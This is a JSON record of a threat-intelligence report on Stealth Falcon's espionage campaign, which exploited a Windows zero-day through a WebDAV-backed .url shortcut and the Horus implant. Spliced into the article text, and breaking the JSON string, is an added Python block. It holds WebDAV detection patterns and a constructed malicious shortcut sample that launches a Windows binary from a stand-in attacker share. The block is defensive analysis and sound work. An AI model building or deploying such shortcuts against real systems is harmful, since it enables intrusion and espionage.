{
	"id": "ec731c39-5dc4-448c-b3c6-175487ae3fa5",
	"created_at": "2026-04-06T03:36:42.417575Z",
	"updated_at": "2026-04-10T03:25:36.512248Z",
	"deleted_at": null,
	"sha1_hash": "e3e73abbc8fb87df552c21a40867605d32ab0397",
	"title": "Inside Stealth Falcon’s Espionage Campaign Using a Microsoft Zero-Day",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 59211,
	"plain_text": "Inside Stealth Falcon’s Espionage Campaign Using a Microsoft\r\nZero-Day\r\nBy bferrite\r\nPublished: 2025-06-10 · Archived: 2026-04-06 02:58:43 UTC\r\nCheck Point Research (CPR) identified a previously unknown Windows vulnerability (CVE-2025-33053)\r\nbeing actively exploited in the wild.\r\nFollowing CPR’s responsible disclosure, Microsoft released a patch on its June 10th Patch Tuesday.\r\nThe zero-day was used in a targeted espionage operation likely conducted by Stealth Falcon, a threat group\r\nknown to target entities in the Middle East and Africa.\r\nThe attack chain begins with a deceptive internet shortcut (.url file) that silently triggers malware hosted on\r\nan attacker-controlled WebDAV server, abusing legitimate Windows tools in the process.\r\nThe operation deployed a sophisticated custom loader and implant designed to evade detection, hinder\r\nanalysis, and selectively activate only on valuable targets.\r\nIn March 2025, Check Point Research uncovered an attempted\r\ncyber attack against a major defense organization in Turkey. The attackers used a previously unknown remote\r\ncode execution vulnerability in Windows to execute files from a remote WebDAV server they controlled,\r\nexploiting a legitimate built-in Windows tool to run malicious code silently. 
Following responsible disclosure,\r\nMicrosoft assigned the vulnerability CVE-2025-33053 and released a patch on June 10, 2025, as part of their\r\nmonthly Patch Tuesday updates.\r\nBased on the techniques used, the infrastructure behind the campaign, and the profile of the intended target, Check\r\nPoint Research attributes this activity to the well-established APT group known as Stealth Falcon.\r\nIn this blog, we break down how the group leveraged CVE-2025-33053 to deliver a custom-built implant known\r\nas Horus Agent, part of a broader toolset designed for espionage. We’ll also explore the implications of this\r\ncampaign for defenders, especially those protecting government, defense, and critical infrastructure organizations.\r\nFor an in-depth understanding of Stealth Falcon’s campaign, read Check Point Research’s comprehensive report\r\nhere.\r\nWho Is Stealth Falcon?\r\nStealth Falcon, also known by the alias FruityArmor, is a long-running cyber espionage group active since at least\r\n2012, with a track record of targeting political and strategic entities across the Middle East and Africa. Over time,\r\nStealth Falcon’s tactics have evolved, but their focus remains on high-value targets in government and defense\r\nhttps://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/\r\nPage 1 of 4\n\nsectors. Today, Stealth Falcon is known for its use of zero-day exploits, custom malware, and delivery\r\nmechanisms, all hallmarks of a well-resourced APT.\r\nHow the Attack Worked\r\nThe attack began with what looked like a standard shortcut file — a .url file disguised as a PDF document related\r\nto military equipment damage. 
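The shortcut described in this section and the WebDAV log check suggested under Mitigation and Defense can both be exercised with the following Python, which is an added example written for this page and not Check Point’s code or anything recovered from the campaign. It assumes a shortcut built the way the post describes: a .url whose URL field points at a built-in Windows binary rather than a web address and whose WorkingDirectory field is a WebDAV UNC path, so that any helper the binary launches by bare name is resolved from the attacker’s share first (CreateProcess consults the current directory before the system directories). The binary name builtin_tool.exe, the host 203.0.113.10, the helper name and the three process-creation events are constructed placeholders; the post does not name the utility that was abused. The event records follow the field names of a Sysmon process-creation event (Image, ParentImage, CurrentDirectory, CommandLine).

```python
# Added example (not Check Point's code). Triage helpers for the two artefacts
# the post describes: (1) an internet shortcut that launches a trusted local
# binary with a WebDAV working directory, and (2) process-creation events in
# which a default Windows process runs from, or reaches into, a WebDAV share.
# Host, file names and event contents are constructed for illustration.
import configparser
import re

# Lower-cased prefix used to decide whether an image is a built-in binary.
WINDOWS_DIR = 'c:\\windows\\'


def is_webdav_unc(path):
    # True for UNC paths served by the Windows WebClient (WebDAV redirector):
    #   \\host@80\share   \\host@SSL@443\share   \\host\DavWWWRoot\...
    # A plain SMB path such as \\fileserver\share is not WebDAV.
    m = re.match(r'^\\\\([^\\@]+)((?:@ssl)?(?:@\d{1,5})?)\\(.*)$',
                 path.strip(), re.IGNORECASE)
    if not m:
        return False
    _host, suffix, rest = m.groups()
    return bool(suffix) or rest.lower().startswith('davwwwroot')


def parse_url_shortcut(text):
    # A .url file is INI text; the fields of interest sit under [InternetShortcut].
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == 'internetshortcut':
            return dict(cp[section])  # configparser lower-cases the keys
    return {}


def triage_url_shortcut(text):
    # Findings for a shortcut whose target is a local Windows binary instead of
    # a web address and whose working directory is a WebDAV share.
    fields = parse_url_shortcut(text)
    target = re.sub(r'^file:/*', '', fields.get('url', ''), flags=re.IGNORECASE)
    target = target.replace('/', '\\')
    workdir = fields.get('workingdirectory', '')
    findings = []
    if re.match(r'^[a-z]:\\windows\\', target, re.IGNORECASE):
        findings.append('target is a local Windows binary: ' + target)
    if is_webdav_unc(workdir):
        findings.append('working directory is a WebDAV share: ' + workdir)
    if len(findings) == 2:
        # CreateProcess searches the current directory before the system
        # directories, so a helper started by bare name comes from the share.
        findings.append('helpers launched by bare name resolve from the share')
    return findings


def triage_process_event(ev):
    # ev is shaped like a Sysmon Event ID 1 (process creation) record.
    image = ev.get('Image', '')
    cwd = ev.get('CurrentDirectory', '')
    cmd = ev.get('CommandLine', '')
    builtin_image = image.lower().startswith(WINDOWS_DIR)
    builtin_parent = ev.get('ParentImage', '').lower().startswith(WINDOWS_DIR)
    reasons = []
    if builtin_image and is_webdav_unc(cwd):
        reasons.append('built-in process started with a WebDAV working directory')
    if builtin_image and any(is_webdav_unc(p) for p in re.findall(r'\\\\\S+', cmd)):
        reasons.append('built-in process given a WebDAV path on its command line')
    if builtin_parent and is_webdav_unc(image):
        reasons.append('built-in process launched an executable from a WebDAV share')
    return reasons


def triage_events(events):
    # Batch form: {index: reasons} for every event that produced a reason.
    return {i: r for i, ev in enumerate(events) if (r := triage_process_event(ev))}


# Constructed sample .url (placeholder binary name; the post does not name the
# abused utility). The icon fields are what make such a file pass as a document.
SAMPLE_URL_FILE = r'''[InternetShortcut]
URL=file:///C:/Windows/System32/builtin_tool.exe
WorkingDirectory=\\203.0.113.10@80\DavWWWRoot\docs
IconFile=C:\Windows\System32\shell32.dll
IconIndex=1
'''

# Constructed events: the shortcut starting the built-in tool, the tool then
# launching a helper by bare name, and ordinary user activity that must not fire.
SAMPLE_EVENTS = [
    {'Image': r'C:\Windows\System32\builtin_tool.exe',
     'ParentImage': r'C:\Windows\explorer.exe',
     'CurrentDirectory': r'\\203.0.113.10@80\DavWWWRoot\docs',
     'CommandLine': r'C:\Windows\System32\builtin_tool.exe'},
    {'Image': r'\\203.0.113.10@80\DavWWWRoot\docs\helper.exe',
     'ParentImage': r'C:\Windows\System32\builtin_tool.exe',
     'CurrentDirectory': r'\\203.0.113.10@80\DavWWWRoot\docs',
     'CommandLine': 'helper.exe'},
    {'Image': r'C:\Windows\System32\notepad.exe',
     'ParentImage': r'C:\Windows\explorer.exe',
     'CurrentDirectory': r'C:\Users\alice\Documents',
     'CommandLine': r'notepad.exe C:\Users\alice\Documents\notes.txt'},
]
```

Calling triage_url_shortcut(SAMPLE_URL_FILE) returns three findings and triage_events(SAMPLE_EVENTS) flags the first two events only. In practice the shortcut triage runs over attachments extracted from mail archives and the event triage over Sysmon or EDR process-creation telemetry; the WebDAV test is the same in both: a UNC whose host carries an @port or @SSL suffix, or whose first component is DavWWWRoot, is served by the WebClient service rather than SMB, which is exactly the signal the Mitigation section asks defenders to hunt for.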
Submitted to VirusTotal by a source associated with a major Turkish defense\r\ncompany, the file was likely delivered via a phishing email, a tactic Stealth Falcon has used many times before.\r\nWhat made this shortcut file dangerous was its ability to silently run code from a remote server controlled by the\r\nattackers. The attackers manipulated the Windows file execution search order, tricking a built-in Windows\r\nutility into executing a malicious program hosted on their remote server.\r\nThis technique allowed Stealth Falcon to run the first stage of the infection chain without dropping any file\r\nonto the victim’s disk. It also helped them evade detection by relying on legitimate,\r\ntrusted Windows components to carry out the attack.\r\nThe infection chain.\r\nHorus Loader: A Customized Entry Point for Espionage\r\nOnce the shortcut file was activated, it kicked off the next phase of the attack: a multi-stage loader we called\r\nHorus Loader, named after the Egyptian falcon god, echoing the group’s codename.\r\nHorus Loader is built to be flexible and evasive. It can:\r\nClean up traces left by earlier parts of the infection chain\r\nBypass basic detection mechanisms\r\nDrop and open a decoy document to avoid suspicion\r\nDeploy the final spyware payload discreetly\r\nThe Final Act: Delivering Horus Agent\r\nWhile the victim is occupied with viewing the decoy document, the malware continues its work quietly in the\r\nbackground. 
What follows is one of the most technically advanced stages of the operation: the deployment of a\r\ncustom-built espionage tool known as Horus Agent.\r\nCustom-Built Backdoor: Horus Agent\r\nThe final payload is Horus Agent, a private implant built for Mythic, a legitimate open-source command-and-control (C2) framework commonly used in red team operations.\r\nUnlike off-the-shelf malware, Horus is written in C++ and built from the ground up with stealth and flexibility in\r\nmind. It shares only basic traits with other known Mythic agents — enough to function on the platform, but not\r\nenough to be easily detected or attributed based on code similarities.\r\nOnce installed, the Horus Agent connects to its C2 server and begins polling for instructions using the Mythic\r\nframework. While some commands are built-in, Stealth Falcon also developed several custom ones tailored for\r\nstealth and flexibility, showing intent for gathering intelligence quietly and executing payloads with minimal\r\ndetection.\r\nUnlike earlier modified Mythic agents, Horus appears custom-built. It emphasizes stealth, anti-analysis\r\nprotections, and a minimal command set, focused on fingerprinting targets and selectively deploying further\r\npayloads. This streamlined design suggests deep awareness of both target environments and defensive tools,\r\nhelping the group stay under the radar while protecting their broader toolset.\r\nConclusion: A Zero-Day Attack with Strategic Implications\r\nStealth Falcon continues to evolve, combining zero-day exploitation (CVE-2025-33053), legitimate tools, multi-stage loaders, and custom-built implants in a resilient campaign. 
Their creative abuse of WebDAV and Windows\r\nworking directory behavior highlights how even small misconfigurations or overlooked features can be\r\nweaponized.\r\nMitigation and Defense\r\nThis attack highlights the importance of proactive threat detection, visibility into system behavior, and real-time\r\nprotection. For organizations in sectors like defense, government, or critical infrastructure, it’s a reminder that\r\ntargeted threats are an ongoing concern. Given the nature of this vulnerability and its connection to core Windows\r\nAPI behavior, it may impact a broad range of Windows versions.\r\nTo determine if your environment has been breached, we suggest examining your logs and monitoring systems for\r\nthe following:\r\nEmails with archive attachments including a seemingly harmless URL or LNK file.\r\nUnusual or unidentified connections to WebDAV servers launched by default Windows processes.\r\nUpon discovering the vulnerability, Check Point quickly developed and deployed protections to keep customers\r\nsecure well before the issue became public. Our Intrusion Prevention System, Threat Emulation, and Harmony\r\nEndpoint solutions now detect and block exploitation attempts targeting this flaw. Check Point Research continues\r\nto monitor global telemetry to track any new activity and provide timely updates as the threat landscape evolves.\r\nFor an in-depth understanding of Stealth Falcon’s campaign, read Check Point Research’s comprehensive report\r\nhere.\r\nSource: https://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/"
	],
	"report_names": [
		"inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day"
	],
	"threat_actors": [
		{
			"id": "0f47a6f3-a181-4e15-9261-50eef5f03a3a",
			"created_at": "2022-10-25T16:07:24.228663Z",
			"updated_at": "2026-04-10T02:00:04.905195Z",
			"deleted_at": null,
			"main_name": "Stealth Falcon",
			"aliases": [
				"FruityArmor",
				"G0038",
				"Project Raven",
				"Stealth Falcon"
			],
			"source_name": "ETDA:Stealth Falcon",
			"tools": [
				"Deadglyph",
				"StealthFalcon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "77aedfa3-e52b-4168-8269-55ccec0946f7",
			"created_at": "2023-01-06T13:46:38.453791Z",
			"updated_at": "2026-04-10T02:00:02.981559Z",
			"deleted_at": null,
			"main_name": "Stealth Falcon",
			"aliases": [
				"FruityArmor",
				"G0038"
			],
			"source_name": "MISPGALAXY:Stealth Falcon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bd084d2f-4233-49b1-b0e6-c7011178dae0",
			"created_at": "2022-10-25T15:50:23.544316Z",
			"updated_at": "2026-04-10T02:00:05.325921Z",
			"deleted_at": null,
			"main_name": "Stealth Falcon",
			"aliases": [
				"Stealth Falcon"
			],
			"source_name": "MITRE:Stealth Falcon",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775446602,
	"ts_updated_at": 1775791536,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e3e73abbc8fb87df552c21a40867605d32ab0397.pdf",
		"text": "https://archive.orkl.eu/e3e73abbc8fb87df552c21a40867605d32ab0397.txt",
		"img": "https://archive.orkl.eu/e3e73abbc8fb87df552c21a40867605d32ab0397.jpg"
	}
}